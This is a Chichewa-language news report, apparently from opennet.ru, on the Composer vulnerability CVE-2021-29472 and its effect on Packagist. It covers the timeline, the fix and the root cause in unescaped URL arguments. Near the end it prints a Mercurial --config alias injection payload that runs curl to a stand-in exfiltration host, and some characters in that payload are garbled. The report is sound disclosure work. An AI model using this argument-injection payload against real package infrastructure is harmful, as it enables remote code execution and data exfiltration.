Chiwopsezo chachikulu (CVE-2021-29472) chadziwika mu Composer dependency manager chomwe chimalola kuti malamulo atsankho atsatidwe padongosolo pokonza paketi yokhala ndi ma URL opangidwa mwapadera omwe amatchula adilesi yotsitsa khodi. Vuto limapezeka muzinthu za GitDriver, SvnDriver, ndi HgDriver zomwe zimagwiritsidwa ntchito pogwiritsa ntchito Git, Subversion, ndi Mercurial source control systems. Kusatetezeka kudathetsedwa mu Composer kutulutsa 1.10.22 ndi 2.0.13.
Zimadziwika kuti nkhaniyi idakhudza kwambiri posungira phukusi la Composer, Packagist, yomwe ili ndi mapaketi 306 a opanga PHP ndipo imathandizira kutsitsa kopitilira 1.4 biliyoni pamwezi. Kuyeseraku kunawonetsa kuti ngati pali chidziwitso cha vutoli, owukira atha kuwongolera zida za Packagist ndikuwongolera zidziwitso zaosamalira kapena kutumiziranso kutsitsa kwapagulu lachitatu, kukonza zoperekera zosintha zamaphukusi ndikusintha koyipa kuti m'malo mwanyumba yakumbuyo. pa nthawi ya kudalira unsembe ndondomeko.
Kuopsa kwa ogwiritsa ntchito kumapeto kumangokhala kuti zomwe zili mu composer.json nthawi zambiri zimatsimikiziridwa ndi wogwiritsa ntchito, ndipo maulalo oyambira amaperekedwa akamapeza malo osungira anthu ena, omwe nthawi zambiri amakhala odalirika. Kuwombera kwakukulu kunagwera pankhokwe ya Packagist.org ndi utumiki wa Private Packagist, womwe umatchedwa Wopanga ndi kusamutsa deta yomwe inalandira kuchokera kwa ogwiritsa ntchito. Owukira amatha kuyika ma code awo pa seva za Packagist poyika phukusi lopangidwa mwapadera.
Gulu la Packagist lidakonza chiwopsezo pasanathe maola 12 chiwopsezocho chinanenedwa. Ofufuzawo adadziwitsa mwachinsinsi opanga Packagist pa Epulo 22, ndipo vutoli lidakonzedwa tsiku lomwelo. Zosintha pagulu za Composer kuthana ndi chiwopsezochi zidasindikizidwa pa Epulo 27, mwatsatanetsatane zidawululidwa pa Epulo 28. Kuwunika kwa zipika pa ma seva a Packagist sikunawonetse zochitika zilizonse zokayikitsa zokhudzana ndi kusatetezeka.
Vutoli limadza chifukwa cha cholakwika mu code yotsimikizira ulalo mufayilo ya composer.json ndi maulalo otsitsa gwero. Cholakwikacho chakhalapo mu code kuyambira November 2011. Packagist amagwiritsa ntchito zigawo zapadera kukonza kutsitsa kwa code popanda kumangirizidwa kudongosolo linalake loyang'anira magwero, omwe amachitidwa poyitana "kuchokera kuShellCommandline" ndikudutsa mikangano yamalamulo. Mwachitsanzo, kwa git, lamulo la "git ls-remote -heads $URL" limatchedwa, pomwe ulalo umakonzedwa pogwiritsa ntchito njira ya "ProcessExecutor::escape($url)", kuthawa zomanga zomwe zingakhale zoopsa monga "$(. ..)" kapena "` ...`".
Chiyambi cha vuto ndi chakuti ProcessExecutor::njira yopulumukira sinathawe mndandanda wa βββ, womwe unalola kuti parameter ina iliyonse yoyimba foni itchulidwe mu URL. Kuthawa koteroko kunali kusowa mu madalaivala a GitDriver.php, SvnDriver.php ndi HgDriver.php. Kuukira kwa GitDriver.php kunalepheretsedwa chifukwa chakuti lamulo la "git ls-remote" silinagwirizane ndi kufotokoza mfundo zina pambuyo pa njira. Kuwukira kwa HgDriver.php kunakhala kotheka podutsa "--config" parameter ku "hq" zofunikira, zomwe zimakulolani kuti mukonzekere kuchitidwa kwa lamulo lililonse mwa kugwiritsira ntchito "alias.identify". Mwachitsanzo, kuti mutsitse ndikuchita kachidindo pogwiritsa ntchito zopiringa, mungatchule: βconfig=alias.identify=!curl http://exfiltration-host.tld βdata β$(ls -alh)β
Potumiza phukusi loyesera ndi URL yofanana ndi Packagist, ofufuzawo adatsimikizira kuti atatha kutumiza, seva yawo idalandira pempho la HTTP kuchokera ku seva imodzi ya Packagist mu AWS yomwe ili ndi mndandanda wa mafayilo omwe ali mu bukhuli.
Source: opennet.ru